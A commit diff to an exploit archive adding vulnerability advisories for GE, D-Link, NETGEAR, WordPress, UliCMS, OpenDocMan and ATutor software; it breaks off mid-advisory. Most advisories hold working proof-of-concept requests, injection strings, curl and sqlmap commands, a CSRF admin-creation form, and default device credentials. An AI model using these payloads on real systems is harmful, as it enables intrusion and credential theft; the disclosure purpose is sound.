DB: 2016-02-05
10 new exploits
This commit is contained in:
parent
1221dcb78e
commit
363cbde9cc
11 changed files with 878 additions and 1 deletions
12
files.csv
12
files.csv
|
@ -35644,6 +35644,16 @@ id,file,description,date,author,platform,type,port
|
||||||
39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
|
39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
|
||||||
39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0
|
39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0
|
||||||
39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80
|
39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80
|
||||||
39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,"Zhaohuan of Tencent Security",jsp,webapps,80
|
39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,ZhaoHuAn,jsp,webapps,80
|
||||||
39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0
|
39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0
|
||||||
39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0
|
39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0
|
||||||
|
39408,platforms/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0
|
||||||
|
39409,platforms/hardware/webapps/39409.txt,"DLink DVGN5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0
|
||||||
|
39410,platforms/php/webapps/39410.txt,"WordPress User Meta Manager Plugin 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80
|
||||||
|
39411,platforms/php/webapps/39411.txt,"WordPress User Meta Manager Plugin 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80
|
||||||
|
39412,platforms/hardware/webapps/39412.txt,"NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0
|
||||||
|
39413,platforms/php/webapps/39413.txt,"UliCMS <= v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80
|
||||||
|
39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - CSRF Vulnerability",2016-02-04,"Curesec Research Team",php,webapps,80
|
||||||
|
39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
|
||||||
|
39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80
|
||||||
|
39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
|
||||||
|
|
Can't render this file because it is too large.
|
72
platforms/hardware/webapps/39408.txt
Executable file
72
platforms/hardware/webapps/39408.txt
Executable file
|
@ -0,0 +1,72 @@
|
||||||
|
# Exploit Title: [GE Industrial Solutions - UPS SNMP Adapter Command
|
||||||
|
Injection and Clear-text Storage of Sensitive Information Vulnerabilities]
|
||||||
|
# Discovered by: Karn Ganeshen
|
||||||
|
# Vendor Homepage: [http://www.geindustrial.com/]
|
||||||
|
# Versions Reported: [All SNMP/Web Interface cards with firmware version
|
||||||
|
prior to 4.8 manufactured by GE Industrial Solutions.]
|
||||||
|
# CVE-IDs: [CVE-2016-0861 + CVE-2016-0862]
|
||||||
|
|
||||||
|
*GE Advisory: *
|
||||||
|
http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf
|
||||||
|
|
||||||
|
|
||||||
|
*ICS-CERT Advisory:*https://ics-cert.us-cert.gov/advisories/ICSA-16-033-02
|
||||||
|
|
||||||
|
*About GE*
|
||||||
|
|
||||||
|
GE is a US-based company that maintains offices in several countries around
|
||||||
|
the world.
|
||||||
|
|
||||||
|
The affected product, SNMP/Web Interface adapter, is a web server designed
|
||||||
|
to present information about the Uninterruptible Power Supply (UPS).
|
||||||
|
According to GE, the SNMP/Web Interface is deployed across several sectors
|
||||||
|
including Critical Manufacturing and Energy. GE estimates that these
|
||||||
|
products are used worldwide.
|
||||||
|
|
||||||
|
*Affected Products*
|
||||||
|
|
||||||
|
• All SNMP/Web Interface cards with firmware version prior to 4.8
|
||||||
|
manufactured by GE Industrial Solutions.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
*VULNERABILITY OVERVIEW*
|
||||||
|
A
|
||||||
|
|
||||||
|
|
||||||
|
*COMMAND INJECTIONCVE-2016-0861*
|
||||||
|
Device application services run as (root) privileged user, and does not
|
||||||
|
perform strict input validation. This allows an authenticated user to
|
||||||
|
execute any system commands on the system.
|
||||||
|
|
||||||
|
Vulnerable function:
|
||||||
|
http://IP/dig.asp <http://ip/dig.asp>
|
||||||
|
|
||||||
|
Vulnerable parameter:
|
||||||
|
Hostname/IP address
|
||||||
|
|
||||||
|
|
||||||
|
*PoC:*
|
||||||
|
In the Hostname/IP address input, enter:
|
||||||
|
; cat /etc/shadow
|
||||||
|
|
||||||
|
Output
|
||||||
|
root:<hash>:0:0:root:/root:/bin/sh
|
||||||
|
<...other system users...>
|
||||||
|
ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh
|
||||||
|
root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh
|
||||||
|
|
||||||
|
B
|
||||||
|
|
||||||
|
|
||||||
|
*CLEARTEXT STORAGE OF SENSITIVE INFORMATIONCVE-2016-0862*
|
||||||
|
File contains sensitive account information stored in cleartext. All users,
|
||||||
|
including non-admins, can view/access device's configuration, via Menu
|
||||||
|
option -> Save -> Settings.
|
||||||
|
|
||||||
|
The application stores all information in clear-text, including *all user
|
||||||
|
logins and clear-text passwords*.
|
||||||
|
--
|
||||||
|
Best Regards,
|
||||||
|
Karn Ganeshen
|
||||||
|
ipositivesecurity.blogspot.in
|
95
platforms/hardware/webapps/39409.txt
Executable file
95
platforms/hardware/webapps/39409.txt
Executable file
|
@ -0,0 +1,95 @@
|
||||||
|
# Exploit Title: [DLink DVGN5402SP Multiple Vulnerabilities]
|
||||||
|
# Discovered by: Karn Ganeshen
|
||||||
|
# Vendor Homepage: [www.dlink.com/]
|
||||||
|
# Versions Reported: [Multiple - See below]
|
||||||
|
# CVE-IDs: [CVE-2015-7245 + CVE-2015-7246 + CVE-2015-7247]
|
||||||
|
|
||||||
|
|
||||||
|
*DLink DVGN5402SP File Path Traversal, Weak Credentials Management, and
|
||||||
|
Sensitive Info Leakage Vulnerabilities*
|
||||||
|
*Vulnerable Models, Firmware, Hardware versions*
|
||||||
|
DVGN5402SP Web Management
|
||||||
|
Model Name : GPN2.4P21CCN
|
||||||
|
Firmware Version : W1000CN00
|
||||||
|
Firmware Version :W1000CN03
|
||||||
|
Firmware Version :W2000EN00
|
||||||
|
Hardware Platform :ZS
|
||||||
|
Hardware Version :Gpn2.4P21C_WIFIV0.05
|
||||||
|
|
||||||
|
Device can be managed through three users:
|
||||||
|
1. super full privileges
|
||||||
|
2. admin full privileges
|
||||||
|
3. support restricted user
|
||||||
|
|
||||||
|
*1. Path traversal*
|
||||||
|
Arbitrary files can be read off of the device file system. No
|
||||||
|
authentication is required to exploit this vulnerability.
|
||||||
|
*CVE-ID*: CVE-2015-7245
|
||||||
|
|
||||||
|
*HTTP Request *
|
||||||
|
|
||||||
|
POST /cgibin/webproc HTTP/1.1
|
||||||
|
Host: <IP>:8080
|
||||||
|
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101
|
||||||
|
Firefox/39.0 Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
AcceptLanguage: enUS,en;q=0.5
|
||||||
|
AcceptEncoding: gzip, deflate
|
||||||
|
Referer: http://<IP>:8080/cgibin/webproc
|
||||||
|
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
|
||||||
|
Connection: keepalive
|
||||||
|
ContentType: application/xwwwformurlencoded
|
||||||
|
ContentLength: 223
|
||||||
|
|
||||||
|
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var%
|
||||||
|
&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
|
||||||
|
|
||||||
|
*HTTP Response*
|
||||||
|
|
||||||
|
HTTP/1.0 200 OK
|
||||||
|
pstVal>name:getpage; pstVal>value:html/main.html
|
||||||
|
pstVal>name:getpage; pstVal>value:html/index.html
|
||||||
|
pstVal>name:errorpage;
|
||||||
|
pstVal>value:../../../../../../../../../../../etc/shadow
|
||||||
|
pstVal>name:var:menu; pstVal>value:setup
|
||||||
|
pstVal>name:var:page; pstVal>value:connected
|
||||||
|
pstVal>name:var:subpage; pstVal>value:
|
||||||
|
pstVal>name:objaction; pstVal>value:auth
|
||||||
|
pstVal>name::username; pstVal>value:super
|
||||||
|
pstVal>name::password; pstVal>value:super
|
||||||
|
pstVal>name::action; pstVal>value:login
|
||||||
|
pstVal>name::sessionid; pstVal>value:1ac5da6b
|
||||||
|
Connection: close
|
||||||
|
Contenttype: text/html
|
||||||
|
Pragma: nocache
|
||||||
|
CacheControl: nocache
|
||||||
|
setcookie: sessionid=1ac5da6b; expires=Fri, 31Dec9999 23:59:59 GMT;
|
||||||
|
path=/
|
||||||
|
|
||||||
|
#root:<hash_redacted>:13796:0:99999:7:::
|
||||||
|
root:<hash_redacted>:13796:0:99999:7:::
|
||||||
|
#tw:<hash_redacted>:13796:0:99999:7:::
|
||||||
|
#tw:<hash_redacted>:13796:0:99999:7:::
|
||||||
|
|
||||||
|
|
||||||
|
*2. Use of Default, HardCoded Credentials**CVE-ID*: CVE-2015-7246
|
||||||
|
|
||||||
|
The device has two system user accounts configured with default passwords
|
||||||
|
(root:root, tw:tw).
|
||||||
|
Login tw is not active though. Anyone could use the default password to
|
||||||
|
gain administrative control through the Telnet service of the system (when
|
||||||
|
enabled) leading to integrity, loss of confidentiality, or loss of
|
||||||
|
availability.
|
||||||
|
|
||||||
|
*3.Sensitive info leakage via device running configuration backup *
|
||||||
|
*CVE-ID*: CVE-2015-7247
|
||||||
|
|
||||||
|
Usernames, Passwords, keys, values and web account hashes (super & admin)
|
||||||
|
are stored in cleartext and not masked. It is noted that restricted
|
||||||
|
'support' user may also access this config backup file from the portal
|
||||||
|
directly, gather clear-text admin creds, and gain full, unauthorized access
|
||||||
|
to the device.
|
||||||
|
--
|
||||||
|
Best Regards,
|
||||||
|
Karn Ganeshen
|
||||||
|
ipositivesecurity.blogspot.in
|
106
platforms/hardware/webapps/39412.txt
Executable file
106
platforms/hardware/webapps/39412.txt
Executable file
|
@ -0,0 +1,106 @@
|
||||||
|
>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
|
||||||
|
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
|
||||||
|
==========================================================================
|
||||||
|
Disclosure: 04/02/2016 / Last updated: 04/02/2016
|
||||||
|
|
||||||
|
|
||||||
|
>> Background on the affected product:
|
||||||
|
"NMS300
|
||||||
|
ProSAFE® Network Management System
|
||||||
|
Diagnose, control, and optimize your network devices.
|
||||||
|
|
||||||
|
The NETGEAR Management System NMS300 delivers insight into network elements, including third-party devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."
|
||||||
|
|
||||||
|
|
||||||
|
>> Summary:
|
||||||
|
Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. The first one is an arbitrary file upload vulnerability that allows an unauthenticated attacker to execute Java code as the SYSTEM user.
|
||||||
|
The second vulnerability is an arbitrary file download that allows an authenticated user to download any file from the host that is running NMS300.
|
||||||
|
|
||||||
|
A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released.
|
||||||
|
|
||||||
|
|
||||||
|
>> Technical details:
|
||||||
|
#1
|
||||||
|
Vulnerability: Remote code execution via arbitrary file upload (unauthenticated)
|
||||||
|
CVE-2016-1525
|
||||||
|
Affected versions:
|
||||||
|
NMS300 1.5.0.11
|
||||||
|
NMS300 1.5.0.2
|
||||||
|
NMS300 1.4.0.17
|
||||||
|
NMS300 1.1.0.13
|
||||||
|
|
||||||
|
There are two servlets that allow unauthenticated file uploads:
|
||||||
|
@RequestMapping({ "/fileUpload.do" })
|
||||||
|
public class FileUpload2Controller
|
||||||
|
- Uses spring file upload
|
||||||
|
|
||||||
|
@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
|
||||||
|
public class FileUploadController
|
||||||
|
- Uses flash upload
|
||||||
|
|
||||||
|
The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension].
|
||||||
|
So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.
|
||||||
|
|
||||||
|
POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
|
||||||
|
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
|
||||||
|
|
||||||
|
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
|
||||||
|
Content-Disposition: form-data; name="name"
|
||||||
|
|
||||||
|
[name]
|
||||||
|
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
|
||||||
|
Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]"
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
|
||||||
|
pageEncoding="ISO-8859-1"%>
|
||||||
|
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|
||||||
|
<title>Hello World Example</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h2>A Hello World Example of JSP.</h2>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--
|
||||||
|
|
||||||
|
|
||||||
|
#2
|
||||||
|
Vulnerability: Arbitrary file download (authenticated)
|
||||||
|
CVE-2016-1524
|
||||||
|
Affected versions:
|
||||||
|
NMS300 1.5.0.11
|
||||||
|
NMS300 1.5.0.2
|
||||||
|
NMS300 1.4.0.17
|
||||||
|
NMS300 1.1.0.13
|
||||||
|
|
||||||
|
Three steps need to be taken in order to exploit this vulnerability:
|
||||||
|
a) Add a configuration image, with the realName parameter containing the path traversal to the target file:
|
||||||
|
POST /data/config/image.do?method=add HTTP/1.1
|
||||||
|
realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla
|
||||||
|
|
||||||
|
b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1):
|
||||||
|
POST /data/getPage.do?method=getPageList&type=configImgManager
|
||||||
|
everyPage=10000
|
||||||
|
|
||||||
|
Sample response:
|
||||||
|
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}
|
||||||
|
|
||||||
|
c) Download the file with the imageId obtained in step 2:
|
||||||
|
GET /data/config/image.do?method=export&imageId=<ID>
|
||||||
|
|
||||||
|
|
||||||
|
>> Fix:
|
||||||
|
No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks.
|
||||||
|
|
||||||
|
|
||||||
|
>> References:
|
||||||
|
[1] https://www.kb.cert.org/vuls/id/777024
|
||||||
|
|
||||||
|
|
||||||
|
================
|
||||||
|
Agile Information Security Limited
|
||||||
|
http://www.agileinfosec.co.uk/
|
||||||
|
>> Enabling secure digital business >>
|
42
platforms/php/webapps/39410.txt
Executable file
42
platforms/php/webapps/39410.txt
Executable file
|
@ -0,0 +1,42 @@
|
||||||
|
* Exploit Title: WordPress User Meta Manager Plugin [Blind SQLI]
|
||||||
|
* Discovery Date: 2015/12/28
|
||||||
|
* Public Disclosure Date: 2016/02/04
|
||||||
|
* Exploit Author: Panagiotis Vagenas
|
||||||
|
* Contact: https://twitter.com/panVagenas
|
||||||
|
* Vendor Homepage: http://jasonlau.biz/home/
|
||||||
|
* Software Link: https://wordpress.org/plugins/user-meta-manager/
|
||||||
|
* Version: 3.4.6
|
||||||
|
* Tested on: WordPress 4.4.1
|
||||||
|
* Category: webapps
|
||||||
|
|
||||||
|
Description
|
||||||
|
================================================================================
|
||||||
|
|
||||||
|
AJAX actions `umm_edit_user_meta` and `umm_delete_user_meta` of the User Meta
|
||||||
|
Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
|
||||||
|
attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET
|
||||||
|
param.
|
||||||
|
|
||||||
|
PoC
|
||||||
|
================================================================================
|
||||||
|
|
||||||
|
|
||||||
|
curl -c ${USER_COOKIES} \
|
||||||
|
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
|
||||||
|
&umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"
|
||||||
|
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
================================================================================
|
||||||
|
|
||||||
|
2015/12/28 - Discovered
|
||||||
|
2015/12/29 - Vendor notified via support forums in WordPress.org
|
||||||
|
2015/12/29 - Vendor notified via contact form in his site
|
||||||
|
2016/01/29 - WordPress security team notified about the issue
|
||||||
|
2016/02/02 - Vendor released version 3.4.7
|
||||||
|
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
|
||||||
|
|
||||||
|
Solution
|
||||||
|
================================================================================
|
||||||
|
|
||||||
|
Update to version 3.4.7
|
44
platforms/php/webapps/39411.txt
Executable file
44
platforms/php/webapps/39411.txt
Executable file
|
@ -0,0 +1,44 @@
|
||||||
|
* Exploit Title: WordPress User Meta Manager Plugin [Privilege Escalation]
|
||||||
|
* Discovery Date: 2015/12/28
|
||||||
|
* Public Disclosure Date: 2016/02/04
|
||||||
|
* Exploit Author: Panagiotis Vagenas
|
||||||
|
* Contact: https://twitter.com/panVagenas
|
||||||
|
* Vendor Homepage: http://jasonlau.biz/home/
|
||||||
|
* Software Link: https://wordpress.org/plugins/user-meta-manager/
|
||||||
|
* Version: 3.4.6
|
||||||
|
* Tested on: WordPress 4.4.1
|
||||||
|
* Category: webapps
|
||||||
|
|
||||||
|
Description
|
||||||
|
================================================================================
|
||||||
|
|
||||||
|
User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege
|
||||||
|
escalation vulnerability. A registered user can modify the meta information of
|
||||||
|
any registered user, including himself. This way he can modify `wp_capabilities`
|
||||||
|
meta to escalate his account to a full privileged administrative account.
|
||||||
|
|
||||||
|
PoC
|
||||||
|
================================================================================
|
||||||
|
|
||||||
|
|
||||||
|
curl -c ${USER_COOKIES} \
|
||||||
|
-d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
|
||||||
|
&umm_meta_key[]=wp_capabilities" \
|
||||||
|
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
|
||||||
|
&umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"
|
||||||
|
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
================================================================================
|
||||||
|
|
||||||
|
2015/12/28 - Discovered
|
||||||
|
2015/12/29 - Vendor notified via support forums in WordPress.org
|
||||||
|
2015/12/29 - Vendor notified via contact form in his site
|
||||||
|
2016/01/29 - WordPress security team notified about the issue
|
||||||
|
2016/02/02 - Vendor released version 3.4.7
|
||||||
|
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
|
||||||
|
|
||||||
|
Solution
|
||||||
|
================================================================================
|
||||||
|
|
||||||
|
No official solution yet exists.
|
87
platforms/php/webapps/39413.txt
Executable file
87
platforms/php/webapps/39413.txt
Executable file
|
@ -0,0 +1,87 @@
|
||||||
|
=============================================
|
||||||
|
MGC ALERT 2016-001
|
||||||
|
- Original release date: January 26, 2016
|
||||||
|
- Last revised: February 02, 2016
|
||||||
|
- Discovered by: Manuel García Cárdenas
|
||||||
|
- Severity: 7,1/10 (CVSS Base Score)
|
||||||
|
=============================================
|
||||||
|
|
||||||
|
I. VULNERABILITY
|
||||||
|
-------------------------
|
||||||
|
Time-based SQL Injection in Admin panel UliCMS <= v9.8.1
|
||||||
|
|
||||||
|
II. BACKGROUND
|
||||||
|
-------------------------
|
||||||
|
UliCMS is a modern web content management solution from Germany, that
|
||||||
|
attempts to make web content management more easier.
|
||||||
|
|
||||||
|
III. DESCRIPTION
|
||||||
|
-------------------------
|
||||||
|
This bug was found using the portal with authentication as administrator.
|
||||||
|
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
|
||||||
|
protocol to interact with the application.
|
||||||
|
|
||||||
|
It is possible to inject SQL code in the variable "country_blacklist" on
|
||||||
|
the page "action=spam_filter".
|
||||||
|
|
||||||
|
IV. PROOF OF CONCEPT
|
||||||
|
-------------------------
|
||||||
|
The following URL's and parameters have been confirmed to all suffer from
|
||||||
|
Time Based Blind SQL injection.
|
||||||
|
|
||||||
|
/ulicms/admin/?action=spam_filter
|
||||||
|
|
||||||
|
(POST)
|
||||||
|
spamfilter_enabled=yes&spamfilter_words_blacklist=a&country_blacklist=ru&submit_spamfilter_settings=Save+Changes
|
||||||
|
|
||||||
|
POC using SQLMap:
|
||||||
|
|
||||||
|
sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter" --cookie="SET
|
||||||
|
COOKIE HERE"
|
||||||
|
--data="spamfilter_enabled=yes&spamfilter_words_blacklist=a&country_blacklist=ru&submit_spamfilter_settings=Save+Changes"
|
||||||
|
-p "country_blacklist" --dbms="mysql" --dbs
|
||||||
|
|
||||||
|
V. BUSINESS IMPACT
|
||||||
|
-------------------------
|
||||||
|
Public defacement, confidential data leakage, and database server
|
||||||
|
compromise can result from these attacks. Client systems can also be
|
||||||
|
targeted, and complete compromise of these client systems is also possible.
|
||||||
|
|
||||||
|
VI. SYSTEMS AFFECTED
|
||||||
|
-------------------------
|
||||||
|
UliCMS <= v9.8.1
|
||||||
|
|
||||||
|
VII. SOLUTION
|
||||||
|
-------------------------
|
||||||
|
Install vendor patch.
|
||||||
|
|
||||||
|
VIII. REFERENCES
|
||||||
|
-------------------------
|
||||||
|
http://en.ulicms.de/
|
||||||
|
|
||||||
|
IX. CREDITS
|
||||||
|
-------------------------
|
||||||
|
This vulnerability has been discovered and reported
|
||||||
|
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
|
||||||
|
|
||||||
|
X. REVISION HISTORY
|
||||||
|
-------------------------
|
||||||
|
January 26, 2016 1: Initial release
|
||||||
|
February 02, 2015 2: Revision to send to lists
|
||||||
|
|
||||||
|
XI. DISCLOSURE TIMELINE
|
||||||
|
-------------------------
|
||||||
|
January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
|
||||||
|
January 26, 2016 2: Send to vendor
|
||||||
|
January 28, 2016 3: Vendor fix vulnerability
|
||||||
|
February 02, 2016 4: Send to the Full-Disclosure lists
|
||||||
|
|
||||||
|
XII. LEGAL NOTICES
|
||||||
|
-------------------------
|
||||||
|
The information contained within this advisory is supplied "as-is" with no
|
||||||
|
warranties or guarantees of fitness of use or otherwise.
|
||||||
|
|
||||||
|
XIII. ABOUT
|
||||||
|
-------------------------
|
||||||
|
Manuel Garcia Cardenas
|
||||||
|
Pentester
|
82
platforms/php/webapps/39414.txt
Executable file
82
platforms/php/webapps/39414.txt
Executable file
|
@ -0,0 +1,82 @@
|
||||||
|
Security Advisory - Curesec Research Team
|
||||||
|
|
||||||
|
1. Introduction
|
||||||
|
|
||||||
|
Affected Product: Opendocman 1.3.4
|
||||||
|
Fixed in: 1.3.5
|
||||||
|
Fixed Version Link: http://www.opendocman.com/free-download/
|
||||||
|
Vendor Website: http://www.opendocman.com/
|
||||||
|
Vulnerability Type: CSRF
|
||||||
|
Remote Exploitable: Yes
|
||||||
|
Reported to vendor: 11/21/2015
|
||||||
|
Disclosed to public: 02/01/2016
|
||||||
|
Release mode: Coordinated Release
|
||||||
|
CVE: n/a
|
||||||
|
Credits Tim Coen of Curesec GmbH
|
||||||
|
|
||||||
|
2. Overview
|
||||||
|
|
||||||
|
CVSS
|
||||||
|
|
||||||
|
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
|
||||||
|
|
||||||
|
Description
|
||||||
|
|
||||||
|
Opendocman does not have CSRF protection, which means that an attacker can
|
||||||
|
perform actions for an admin, if the admin visits an attacker controlled
|
||||||
|
website while logged in.
|
||||||
|
|
||||||
|
3. Proof of Concept
|
||||||
|
|
||||||
|
Add new Admin User:
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://localhost/opendocman-1.3.4/user.php" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="hidden" name="last_name" value="test" />
|
||||||
|
<input type="hidden" name="first_name" value="test" />
|
||||||
|
<input type="hidden" name="username" value="test" />
|
||||||
|
<input type="hidden" name="phonenumber" value="1214532" />
|
||||||
|
<input type="hidden" name="password" value="12345678" />
|
||||||
|
<input type="hidden" name="Email" value="test@example.com" />
|
||||||
|
<input type="hidden" name="department" value="1" />
|
||||||
|
<input type="hidden" name="admin" value="1" />
|
||||||
|
<input type="hidden" name="can_add" value="1" />
|
||||||
|
<input type="hidden" name="can_checkin" value="1" />
|
||||||
|
<input type="hidden" name="submit" value="Add User" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
4. Solution
|
||||||
|
|
||||||
|
To mitigate this issue please upgrade at least to version 1.3.5:
|
||||||
|
|
||||||
|
http://www.opendocman.com/free-download/
|
||||||
|
|
||||||
|
Please note that a newer version might already be available.
|
||||||
|
|
||||||
|
5. Report Timeline
|
||||||
|
|
||||||
|
11/21/2015 Informed Vendor about Issue (no reply)
|
||||||
|
12/10/2015 Reminded Vendor of disclosure date
|
||||||
|
12/19/2015 Vendor sends fix for CSRF for verification
|
||||||
|
01/13/2016 Confirmed CSRF fix
|
||||||
|
01/20/2016 Vendor requests more time to fix other issues in same version
|
||||||
|
01/31/2016 Vendor releases fix
|
||||||
|
02/01/2015 Disclosed to public
|
||||||
|
|
||||||
|
|
||||||
|
Blog Reference:
|
||||||
|
https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html
|
||||||
|
|
||||||
|
--
|
||||||
|
blog: https://blog.curesec.com
|
||||||
|
tweet: https://twitter.com/curesec
|
||||||
|
|
||||||
|
Curesec GmbH
|
||||||
|
Curesec Research Team
|
||||||
|
Romain-Rolland-Str 14-24
|
||||||
|
13089 Berlin, Germany
|
164
platforms/php/webapps/39415.txt
Executable file
164
platforms/php/webapps/39415.txt
Executable file
|
@ -0,0 +1,164 @@
|
||||||
|
Security Advisory - Curesec Research Team
|
||||||
|
|
||||||
|
1. Introduction
|
||||||
|
|
||||||
|
Affected Product: Atutor 2.2
|
||||||
|
Fixed in: partly in ATutor 2.2.1-RC1, complete in 2.2.1
|
||||||
|
Fixed Version Link: http://www.atutor.ca/atutor/download.php
|
||||||
|
Vendor Website: http://www.atutor.ca/
|
||||||
|
Vulnerability Type: XSS
|
||||||
|
Remote Exploitable: Yes
|
||||||
|
Reported to vendor: 11/17/2015
|
||||||
|
Disclosed to public: 02/01/2016
|
||||||
|
Release mode: Coordinated Release
|
||||||
|
CVE: n/a
|
||||||
|
Credits Tim Coen of Curesec GmbH
|
||||||
|
|
||||||
|
2. Overview
|
||||||
|
|
||||||
|
Atutor is a learning management system (LMS) written in PHP. In version 2.2, it
|
||||||
|
is vulnerable to multiple reflected and persistent XSS attacks.
|
||||||
|
|
||||||
|
The vulnerabilities can lead to the stealing of cookies, injection of
|
||||||
|
keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a
|
||||||
|
